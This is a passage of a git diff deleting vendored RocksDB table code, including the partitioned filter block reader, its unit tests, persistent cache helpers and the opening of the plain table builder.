-    delete filter_partition.value;
-  }
-  return res;
-}
-
-bool PartitionedFilterBlockReader::PrefixMayMatch(
-    const Slice& prefix, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(const_ikey_ptr != nullptr);
-  assert(block_offset == kNotValid);
-  if (!prefix_extractor_) {
-    return true;
-  }
-  if (UNLIKELY(idx_on_fltr_blk_->size() == 0)) {
-    return true;
-  }
-  auto filter_handle = GetFilterPartitionHandle(*const_ikey_ptr);
-  if (UNLIKELY(filter_handle.size() == 0)) {  // prefix is out of range
-    return false;
-  }
-  bool cached = false;
-  auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */,
-                                             &filter_handle, no_io, &cached);
-  if (UNLIKELY(!filter_partition.value)) {
-    return true;
-  }
-  auto res = filter_partition.value->PrefixMayMatch(prefix, kNotValid, no_io);
-  if (cached) {
-    return res;
-  }
-  if (LIKELY(filter_partition.IsSet())) {
-    filter_partition.Release(table_->rep_->table_options.block_cache.get());
-  } else {
-    delete filter_partition.value;
-  }
-  return res;
-}
-
-Slice PartitionedFilterBlockReader::GetFilterPartitionHandle(
-    const Slice& entry) {
-  BlockIter iter;
-  idx_on_fltr_blk_->NewIterator(&comparator_, &iter, true);
-  iter.Seek(entry);
-  if (UNLIKELY(!iter.Valid())) {
-    return Slice();
-  }
-  assert(iter.Valid());
-  Slice handle_value = iter.value();
-  return handle_value;
-}
-
-BlockBasedTable::CachableEntry<FilterBlockReader>
-PartitionedFilterBlockReader::GetFilterPartition(
-    FilePrefetchBuffer* prefetch_buffer, Slice* handle_value, const bool no_io,
-    bool* cached) {
-  BlockHandle fltr_blk_handle;
-  auto s = fltr_blk_handle.DecodeFrom(handle_value);
-  assert(s.ok());
-  const bool is_a_filter_partition = true;
-  auto block_cache = table_->rep_->table_options.block_cache.get();
-  if (LIKELY(block_cache != nullptr)) {
-    if (filter_map_.size() != 0) {
-      auto iter = filter_map_.find(fltr_blk_handle.offset());
-      // This is a possible scenario since block cache might not have had space
-      // for the partition
-      if (iter != filter_map_.end()) {
-        PERF_COUNTER_ADD(block_cache_hit_count, 1);
-        RecordTick(statistics(), BLOCK_CACHE_FILTER_HIT);
-        RecordTick(statistics(), BLOCK_CACHE_HIT);
-        RecordTick(statistics(), BLOCK_CACHE_BYTES_READ,
-                   block_cache->GetUsage(iter->second.cache_handle));
-        *cached = true;
-        return iter->second;
-      }
-    }
-    return table_->GetFilter(/*prefetch_buffer*/ nullptr, fltr_blk_handle,
-                             is_a_filter_partition, no_io);
-  } else {
-    auto filter = table_->ReadFilter(prefetch_buffer, fltr_blk_handle,
-                                     is_a_filter_partition);
-    return {filter, nullptr};
-  }
-}
-
-size_t PartitionedFilterBlockReader::ApproximateMemoryUsage() const {
-  return idx_on_fltr_blk_->size();
-}
-
-// TODO(myabandeh): merge this with the same function in IndexReader
-void PartitionedFilterBlockReader::CacheDependencies(bool pin) {
-  // Before read partitions, prefetch them to avoid lots of IOs
-  auto rep = table_->rep_;
-  BlockIter biter;
-  BlockHandle handle;
-  idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true);
-  // Index partitions are assumed to be consecuitive. Prefetch them all.
-  // Read the first block offset
-  biter.SeekToFirst();
-  Slice input = biter.value();
-  Status s = handle.DecodeFrom(&input);
-  assert(s.ok());
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(rep->ioptions.info_log,
-                   "Could not read first index partition");
-    return;
-  }
-  uint64_t prefetch_off = handle.offset();
-
-  // Read the last block's offset
-  biter.SeekToLast();
-  input = biter.value();
-  s = handle.DecodeFrom(&input);
-  assert(s.ok());
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(rep->ioptions.info_log,
-                   "Could not read last index partition");
-    return;
-  }
-  uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize;
-  uint64_t prefetch_len = last_off - prefetch_off;
-  std::unique_ptr<FilePrefetchBuffer> prefetch_buffer;
-  auto& file = table_->rep_->file;
-  prefetch_buffer.reset(new FilePrefetchBuffer());
-  s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len);
-
-  // After prefetch, read the partitions one by one
-  biter.SeekToFirst();
-  Cache* block_cache = rep->table_options.block_cache.get();
-  for (; biter.Valid(); biter.Next()) {
-    input = biter.value();
-    s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log, "Could not read index partition");
-      continue;
-    }
-
-    const bool no_io = true;
-    const bool is_a_filter_partition = true;
-    auto filter = table_->GetFilter(prefetch_buffer.get(), handle,
-                                    is_a_filter_partition, !no_io);
-    if (LIKELY(filter.IsSet())) {
-      if (pin) {
-        filter_map_[handle.offset()] = std::move(filter);
-      } else {
-        block_cache->Release(filter.cache_handle);
-      }
-    } else {
-      delete filter.value;
-    }
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/partitioned_filter_block.h b/thirdparty/rocksdb/table/partitioned_filter_block.h
deleted file mode 100644
index 1a00a86..0000000
--- a/thirdparty/rocksdb/table/partitioned_filter_block.h
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <list>
-#include <string>
-#include <unordered_map>
-#include "db/dbformat.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-
-#include "table/block.h"
-#include "table/block_based_table_reader.h"
-#include "table/full_filter_block.h"
-#include "table/index_builder.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class PartitionedFilterBlockBuilder : public FullFilterBlockBuilder {
- public:
-  explicit PartitionedFilterBlockBuilder(
-      const SliceTransform* prefix_extractor, bool whole_key_filtering,
-      FilterBitsBuilder* filter_bits_builder, int index_block_restart_interval,
-      PartitionedIndexBuilder* const p_index_builder,
-      const uint32_t partition_size);
-
-  virtual ~PartitionedFilterBlockBuilder();
-
-  void AddKey(const Slice& key) override;
-
-  virtual Slice Finish(const BlockHandle& last_partition_block_handle,
-                       Status* status) override;
-
- private:
-  // Filter data
-  BlockBuilder index_on_filter_block_builder_;  // top-level index builder
-  struct FilterEntry {
-    std::string key;
-    Slice filter;
-  };
-  std::list<FilterEntry> filters;  // list of partitioned indexes and their keys
-  std::unique_ptr<IndexBuilder> value;
-  std::vector<std::unique_ptr<const char[]>> filter_gc;
-  bool finishing_filters =
-      false;  // true if Finish is called once but not complete yet.
-  // The policy of when cut a filter block and Finish it
-  void MaybeCutAFilterBlock();
-  // Currently we keep the same number of partitions for filters and indexes.
-  // This would allow for some potentioal optimizations in future. If such
-  // optimizations did not realize we can use different number of partitions and
-  // eliminate p_index_builder_
-  PartitionedIndexBuilder* const p_index_builder_;
-  // The desired number of filters per partition
-  uint32_t filters_per_partition_;
-  // The current number of filters in the last partition
-  uint32_t filters_in_partition_;
-};
-
-class PartitionedFilterBlockReader : public FilterBlockReader {
- public:
-  explicit PartitionedFilterBlockReader(const SliceTransform* prefix_extractor,
-                                        bool whole_key_filtering,
-                                        BlockContents&& contents,
-                                        FilterBitsReader* filter_bits_reader,
-                                        Statistics* stats,
-                                        const Comparator& comparator,
-                                        const BlockBasedTable* table);
-  virtual ~PartitionedFilterBlockReader();
-
-  virtual bool IsBlockBased() override { return false; }
-  virtual bool KeyMayMatch(
-      const Slice& key, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual bool PrefixMayMatch(
-      const Slice& prefix, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual size_t ApproximateMemoryUsage() const override;
-
- private:
-  Slice GetFilterPartitionHandle(const Slice& entry);
-  BlockBasedTable::CachableEntry<FilterBlockReader> GetFilterPartition(
-      FilePrefetchBuffer* prefetch_buffer, Slice* handle, const bool no_io,
-      bool* cached);
-  virtual void CacheDependencies(bool pin) override;
-
-  const SliceTransform* prefix_extractor_;
-  std::unique_ptr<Block> idx_on_fltr_blk_;
-  const Comparator& comparator_;
-  const BlockBasedTable* table_;
-  std::unordered_map<uint64_t,
-                     BlockBasedTable::CachableEntry<FilterBlockReader>>
-      filter_map_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/partitioned_filter_block_test.cc b/thirdparty/rocksdb/table/partitioned_filter_block_test.cc
deleted file mode 100644
index 1bc529e..0000000
--- a/thirdparty/rocksdb/table/partitioned_filter_block_test.cc
+++ /dev/null
@@ -1,299 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <map>
-
-#include "rocksdb/filter_policy.h"
-
-#include "table/full_filter_bits_builder.h"
-#include "table/index_builder.h"
-#include "table/partitioned_filter_block.h"
-#include "util/coding.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-std::map<uint64_t, Slice> slices;
-
-class MockedBlockBasedTable : public BlockBasedTable {
- public:
-  explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {
-    // Initialize what Open normally does as much as necessary for the test
-    rep->cache_key_prefix_size = 10;
-  }
-
-  virtual CachableEntry<FilterBlockReader> GetFilter(
-      FilePrefetchBuffer*, const BlockHandle& filter_blk_handle,
-      const bool /* unused */, bool /* unused */) const override {
-    Slice slice = slices[filter_blk_handle.offset()];
-    auto obj = new FullFilterBlockReader(
-        nullptr, true, BlockContents(slice, false, kNoCompression),
-        rep_->table_options.filter_policy->GetFilterBitsReader(slice), nullptr);
-    return {obj, nullptr};
-  }
-};
-
-class PartitionedFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-  InternalKeyComparator icomp = InternalKeyComparator(BytewiseComparator());
-
-  PartitionedFilterBlockTest() {
-    table_options_.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    table_options_.no_block_cache = true;  // Otherwise BlockBasedTable::Close
-                                           // will access variable that are not
-                                           // initialized in our mocked version
-  }
-
-  std::shared_ptr<Cache> cache_;
-  ~PartitionedFilterBlockTest() {}
-
-  const std::string keys[4] = {"afoo", "bar", "box", "hello"};
-  const std::string missing_keys[2] = {"missing", "other"};
-
-  uint64_t MaxIndexSize() {
-    int num_keys = sizeof(keys) / sizeof(*keys);
-    uint64_t max_key_size = 0;
-    for (int i = 1; i < num_keys; i++) {
-      max_key_size = std::max(max_key_size, static_cast<uint64_t>(keys[i].size()));
-    }
-    uint64_t max_index_size = num_keys * (max_key_size + 8 /*handle*/);
-    return max_index_size;
-  }
-
-  uint64_t MaxFilterSize() {
-    uint32_t dont_care1, dont_care2;
-    int num_keys = sizeof(keys) / sizeof(*keys);
-    auto filter_bits_reader = dynamic_cast<rocksdb::FullFilterBitsBuilder*>(
-        table_options_.filter_policy->GetFilterBitsBuilder());
-    assert(filter_bits_reader);
-    auto partition_size =
-        filter_bits_reader->CalculateSpace(num_keys, &dont_care1, &dont_care2);
-    delete filter_bits_reader;
-    return partition_size + table_options_.block_size_deviation;
-  }
-
-  int last_offset = 10;
-  BlockHandle Write(const Slice& slice) {
-    BlockHandle bh(last_offset + 1, slice.size());
-    slices[bh.offset()] = slice;
-    last_offset += bh.size();
-    return bh;
-  }
-
-  PartitionedIndexBuilder* NewIndexBuilder() {
-    return PartitionedIndexBuilder::CreateIndexBuilder(&icomp, table_options_);
-  }
-
-  PartitionedFilterBlockBuilder* NewBuilder(
-      PartitionedIndexBuilder* const p_index_builder) {
-    assert(table_options_.block_size_deviation <= 100);
-    auto partition_size = static_cast<uint32_t>(
-        table_options_.metadata_block_size *
-        ( 100 - table_options_.block_size_deviation));
-    partition_size = std::max(partition_size, static_cast<uint32_t>(1));
-    return new PartitionedFilterBlockBuilder(
-        nullptr, table_options_.whole_key_filtering,
-        table_options_.filter_policy->GetFilterBitsBuilder(),
-        table_options_.index_block_restart_interval, p_index_builder,
-        partition_size);
-  }
-
-  std::unique_ptr<MockedBlockBasedTable> table;
-
-  PartitionedFilterBlockReader* NewReader(
-      PartitionedFilterBlockBuilder* builder) {
-    BlockHandle bh;
-    Status status;
-    Slice slice;
-    do {
-      slice = builder->Finish(bh, &status);
-      bh = Write(slice);
-    } while (status.IsIncomplete());
-    const Options options;
-    const ImmutableCFOptions ioptions(options);
-    const EnvOptions env_options;
-    table.reset(new MockedBlockBasedTable(new BlockBasedTable::Rep(
-        ioptions, env_options, table_options_, icomp, false)));
-    auto reader = new PartitionedFilterBlockReader(
-        nullptr, true, BlockContents(slice, false, kNoCompression), nullptr,
-        nullptr, *icomp.user_comparator(), table.get());
-    return reader;
-  }
-
-  void VerifyReader(PartitionedFilterBlockBuilder* builder,
-                    bool empty = false) {
-    std::unique_ptr<PartitionedFilterBlockReader> reader(NewReader(builder));
-    // Querying added keys
-    const bool no_io = true;
-    for (auto key : keys) {
-      auto ikey = InternalKey(key, 0, ValueType::kTypeValue);
-      const Slice ikey_slice = Slice(*ikey.rep());
-      ASSERT_TRUE(reader->KeyMayMatch(key, kNotValid, !no_io, &ikey_slice));
-    }
-    {
-      // querying a key twice
-      auto ikey = InternalKey(keys[0], 0, ValueType::kTypeValue);
-      const Slice ikey_slice = Slice(*ikey.rep());
-      ASSERT_TRUE(reader->KeyMayMatch(keys[0], kNotValid, !no_io, &ikey_slice));
-    }
-    // querying missing keys
-    for (auto key : missing_keys) {
-      auto ikey = InternalKey(key, 0, ValueType::kTypeValue);
-      const Slice ikey_slice = Slice(*ikey.rep());
-      if (empty) {
-        ASSERT_TRUE(reader->KeyMayMatch(key, kNotValid, !no_io, &ikey_slice));
-      } else {
-        // assuming a good hash function
-        ASSERT_FALSE(reader->KeyMayMatch(key, kNotValid, !no_io, &ikey_slice));
-      }
-    }
-  }
-
-  int TestBlockPerKey() {
-    std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-    std::unique_ptr<PartitionedFilterBlockBuilder> builder(
-        NewBuilder(pib.get()));
-    int i = 0;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i]);
-
-    VerifyReader(builder.get());
-    return CountNumOfIndexPartitions(pib.get());
-  }
-
-  void TestBlockPerTwoKeys() {
-    std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-    std::unique_ptr<PartitionedFilterBlockBuilder> builder(
-        NewBuilder(pib.get()));
-    int i = 0;
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i]);
-
-    VerifyReader(builder.get());
-  }
-
-  void TestBlockPerAllKeys() {
-    std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-    std::unique_ptr<PartitionedFilterBlockBuilder> builder(
-        NewBuilder(pib.get()));
-    int i = 0;
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i]);
-
-    VerifyReader(builder.get());
-  }
-
-  void CutABlock(PartitionedIndexBuilder* builder,
-                 const std::string& user_key) {
-    // Assuming a block is cut, add an entry to the index
-    std::string key =
-        std::string(*InternalKey(user_key, 0, ValueType::kTypeValue).rep());
-    BlockHandle dont_care_block_handle(1, 1);
-    builder->AddIndexEntry(&key, nullptr, dont_care_block_handle);
-  }
-
-  void CutABlock(PartitionedIndexBuilder* builder, const std::string& user_key,
-                 const std::string& next_user_key) {
-    // Assuming a block is cut, add an entry to the index
-    std::string key =
-        std::string(*InternalKey(user_key, 0, ValueType::kTypeValue).rep());
-    std::string next_key = std::string(
-        *InternalKey(next_user_key, 0, ValueType::kTypeValue).rep());
-    BlockHandle dont_care_block_handle(1, 1);
-    Slice slice = Slice(next_key.data(), next_key.size());
-    builder->AddIndexEntry(&key, &slice, dont_care_block_handle);
-  }
-
-  int CountNumOfIndexPartitions(PartitionedIndexBuilder* builder) {
-    IndexBuilder::IndexBlocks dont_care_ib;
-    BlockHandle dont_care_bh(10, 10);
-    Status s;
-    int cnt = 0;
-    do {
-      s = builder->Finish(&dont_care_ib, dont_care_bh);
-      cnt++;
-    } while (s.IsIncomplete());
-    return cnt - 1;  // 1 is 2nd level index
-  }
-};
-
-TEST_F(PartitionedFilterBlockTest, EmptyBuilder) {
-  std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-  std::unique_ptr<PartitionedFilterBlockBuilder> builder(NewBuilder(pib.get()));
-  const bool empty = true;
-  VerifyReader(builder.get(), empty);
-}
-
-TEST_F(PartitionedFilterBlockTest, OneBlock) {
-  uint64_t max_index_size = MaxIndexSize();
-  for (uint64_t i = 1; i < max_index_size + 1; i++) {
-    table_options_.metadata_block_size = i;
-    TestBlockPerAllKeys();
-  }
-}
-
-TEST_F(PartitionedFilterBlockTest, TwoBlocksPerKey) {
-  uint64_t max_index_size = MaxIndexSize();
-  for (uint64_t i = 1; i < max_index_size + 1; i++) {
-    table_options_.metadata_block_size = i;
-    TestBlockPerTwoKeys();
-  }
-}
-
-TEST_F(PartitionedFilterBlockTest, OneBlockPerKey) {
-  uint64_t max_index_size = MaxIndexSize();
-  for (uint64_t i = 1; i < max_index_size + 1; i++) {
-    table_options_.metadata_block_size = i;
-    TestBlockPerKey();
-  }
-}
-
-TEST_F(PartitionedFilterBlockTest, PartitionCount) {
-  int num_keys = sizeof(keys) / sizeof(*keys);
-  table_options_.metadata_block_size =
-      std::max(MaxIndexSize(), MaxFilterSize());
-  int partitions = TestBlockPerKey();
-  ASSERT_EQ(partitions, 1);
-  // A low number ensures cutting a block after each key
-  table_options_.metadata_block_size = 1;
-  partitions = TestBlockPerKey();
-  ASSERT_EQ(partitions, num_keys - 1 /* last two keys make one flush */);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/persistent_cache_helper.cc b/thirdparty/rocksdb/table/persistent_cache_helper.cc
deleted file mode 100644
index ec1cac0..0000000
--- a/thirdparty/rocksdb/table/persistent_cache_helper.cc
+++ /dev/null
@@ -1,114 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/persistent_cache_helper.h"
-#include "table/block_based_table_reader.h"
-#include "table/format.h"
-
-namespace rocksdb {
-
-void PersistentCacheHelper::InsertRawPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    const char* data, const size_t size) {
-  assert(cache_options.persistent_cache);
-  assert(cache_options.persistent_cache->IsCompressed());
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // insert content to cache
-  cache_options.persistent_cache->Insert(key, data, size);
-}
-
-void PersistentCacheHelper::InsertUncompressedPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    const BlockContents& contents) {
-  assert(cache_options.persistent_cache);
-  assert(!cache_options.persistent_cache->IsCompressed());
-  if (!contents.cachable || contents.compression_type != kNoCompression) {
-    // We shouldn't cache this. Either
-    // (1) content is not cacheable
-    // (2) content is compressed
-    return;
-  }
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // insert block contents to page cache
-  cache_options.persistent_cache->Insert(key, contents.data.data(),
-                                         contents.data.size());
-}
-
-Status PersistentCacheHelper::LookupRawPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    std::unique_ptr<char[]>* raw_data, const size_t raw_data_size) {
-  assert(cache_options.persistent_cache);
-  assert(cache_options.persistent_cache->IsCompressed());
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // Lookup page
-  size_t size;
-  Status s = cache_options.persistent_cache->Lookup(key, raw_data, &size);
-  if (!s.ok()) {
-    // cache miss
-    RecordTick(cache_options.statistics, PERSISTENT_CACHE_MISS);
-    return s;
-  }
-
-  // cache hit
-  assert(raw_data_size == handle.size() + kBlockTrailerSize);
-  assert(size == raw_data_size);
-  RecordTick(cache_options.statistics, PERSISTENT_CACHE_HIT);
-  return Status::OK();
-}
-
-Status PersistentCacheHelper::LookupUncompressedPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    BlockContents* contents) {
-  assert(cache_options.persistent_cache);
-  assert(!cache_options.persistent_cache->IsCompressed());
-  if (!contents) {
-    // We shouldn't lookup in the cache. Either
-    // (1) Nowhere to store
-    return Status::NotFound();
-  }
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // Lookup page
-  std::unique_ptr<char[]> data;
-  size_t size;
-  Status s = cache_options.persistent_cache->Lookup(key, &data, &size);
-  if (!s.ok()) {
-    // cache miss
-    RecordTick(cache_options.statistics, PERSISTENT_CACHE_MISS);
-    return s;
-  }
-
-  // please note we are potentially comparing compressed data size with
-  // uncompressed data size
-  assert(handle.size() <= size);
-
-  // update stats
-  RecordTick(cache_options.statistics, PERSISTENT_CACHE_HIT);
-  // construct result and return
-  *contents =
-      BlockContents(std::move(data), size, false /*cacheable*/, kNoCompression);
-  return Status::OK();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/persistent_cache_helper.h b/thirdparty/rocksdb/table/persistent_cache_helper.h
deleted file mode 100644
index ac8ee03..0000000
--- a/thirdparty/rocksdb/table/persistent_cache_helper.h
+++ /dev/null
@@ -1,44 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <string>
-
-#include "monitoring/statistics.h"
-#include "table/format.h"
-#include "table/persistent_cache_options.h"
-
-namespace rocksdb {
-
-struct BlockContents;
-
-// PersistentCacheHelper
-//
-// Encapsulates  some of the helper logic for read and writing from the cache
-class PersistentCacheHelper {
- public:
-  // insert block into raw page cache
-  static void InsertRawPage(const PersistentCacheOptions& cache_options,
-                            const BlockHandle& handle, const char* data,
-                            const size_t size);
-
-  // insert block into uncompressed cache
-  static void InsertUncompressedPage(
-      const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-      const BlockContents& contents);
-
-  // lookup block from raw page cacge
-  static Status LookupRawPage(const PersistentCacheOptions& cache_options,
-                              const BlockHandle& handle,
-                              std::unique_ptr<char[]>* raw_data,
-                              const size_t raw_data_size);
-
-  // lookup block from uncompressed cache
-  static Status LookupUncompressedPage(
-      const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-      BlockContents* contents);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/persistent_cache_options.h b/thirdparty/rocksdb/table/persistent_cache_options.h
deleted file mode 100644
index acd6403..0000000
--- a/thirdparty/rocksdb/table/persistent_cache_options.h
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <string>
-
-#include "monitoring/statistics.h"
-#include "rocksdb/persistent_cache.h"
-
-namespace rocksdb {
-
-// PersistentCacheOptions
-//
-// This describe the caching behavior for page cache
-// This is used to pass the context for caching and the cache handle
-struct PersistentCacheOptions {
-  PersistentCacheOptions() {}
-  explicit PersistentCacheOptions(
-      const std::shared_ptr<PersistentCache>& _persistent_cache,
-      const std::string _key_prefix, Statistics* const _statistics)
-      : persistent_cache(_persistent_cache),
-        key_prefix(_key_prefix),
-        statistics(_statistics) {}
-
-  virtual ~PersistentCacheOptions() {}
-
-  std::shared_ptr<PersistentCache> persistent_cache;
-  std::string key_prefix;
-  Statistics* statistics = nullptr;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/plain_table_builder.cc b/thirdparty/rocksdb/table/plain_table_builder.cc
deleted file mode 100644
index 9648043..0000000
--- a/thirdparty/rocksdb/table/plain_table_builder.cc
+++ /dev/null
@@ -1,296 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/plain_table_builder.h"
-
-#include <assert.h>
-
-#include <string>
-#include <limits>
-#include <map>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/plain_table_factory.h"
-#include "db/dbformat.h"
-#include "table/block_builder.h"
-#include "table/bloom_block.h"
-#include "table/plain_table_index.h"
-#include "table/format.h"
-#include "table/meta_blocks.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-namespace {
-
-// a utility that helps writing block content to the file
-//   @offset will advance if @block_contents was successfully written.
-//   @block_handle the block handle this particular block.
-Status WriteBlock(const Slice& block_contents, WritableFileWriter* file,
-                  uint64_t* offset, BlockHandle* block_handle) {
-  block_handle->set_offset(*offset);
-  block_handle->set_size(block_contents.size());
-  Status s = file->Append(block_contents);
-
-  if (s.ok()) {
-    *offset += block_contents.size();
-  }
-  return s;
-}
-
-}  // namespace
-
-// kPlainTableMagicNumber was picked by running
-//    echo rocksdb.table.plain | sha1sum
-// and taking the leading 64 bits.
-extern const uint64_t kPlainTableMagicNumber = 0x8242229663bf9564ull;
-extern const uint64_t kLegacyPlainTableMagicNumber = 0x4f3418eb7a8f13b8ull;
-
-PlainTableBuilder::PlainTableBuilder(
-    const ImmutableCFOptions& ioptions,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, WritableFileWriter* file, uint32_t user_key_len,
-    EncodingType encoding_type, size_t index_sparseness,
-    uint32_t bloom_bits_per_key, const std::string& column_family_name,
-    uint32_t num_probes, size_t huge_page_tlb_size, double hash_table_ratio,
-    bool store_index_in_file)
-    : ioptions_(ioptions),
-      bloom_block_(num_probes),
-      file_(file),
-      bloom_bits_per_key_(bloom_bits_per_key),
-      huge_page_tlb_size_(huge_page_tlb_size),
-      encoder_(encoding_type, user_key_len, ioptions.prefix_extractor,
-               index_sparseness),
-      store_index_in_file_(store_index_in_file),
-      prefix_extractor_(ioptions.prefix_extractor) {
-  // Build index block and save it in the file if hash_table_ratio > 0
-  if (store_index_in_file_) {
-    assert(hash_table_ratio > 0 || IsTotalOrderMode());
-    index_builder_.reset(
-        new PlainTableIndexBuilder(&arena_, ioptions, index_sparseness,
-                                   hash_table_ratio, huge_page_tlb_size_));
-    properties_.user_collected_properties
-        [PlainTablePropertyNames::kBloomVersion] = "1";  // For future use
-  }
-
-  properties_.fixed_key_len = user_key_len;
-
-  // for plain table, we put all the data in a big chuck.
-  properties_.num_data_blocks = 1;
-  // Fill it later if store_index_in_file_ == true
-  properties_.index_size = 0;
-  properties_.filter_size = 0;
-  // To support roll-back to previous version, now still use version 0 for
-  // plain encoding.
-  properties_.format_version = (encoding_type == kPlain) ? 0 : 1;
-  properties_.column_family_id = column_family_id;
-  properties_.column_family_name = column_family_name;
-  properties_.prefix_extractor_name = ioptions_.prefix_extractor != nullptr
-                                          ? ioptions_.prefix_extractor->Name()
-                                          : "nullptr";
-
-  std::string val;
-  PutFixed32(&val, static_cast<uint32_t>(encoder_.GetEncodingType()));
-  properties_.user_collected_properties
-      [PlainTablePropertyNames::kEncodingType] = val;
-
-  for (auto& collector_factories : *int_tbl_prop_collector_factories) {
-    table_properties_collectors_.emplace_back(
-        collector_factories->CreateIntTblPropCollector(column_family_id));
-  }
-}
-
-PlainTableBuilder::~PlainTableBuilder() {
-}
-
-void PlainTableBuilder::Add(const Slice& key, const Slice& value) {
-  // temp buffer for metadata bytes between key and value.
-  char meta_bytes_buf[6];
-  size_t meta_bytes_buf_size = 0;
-
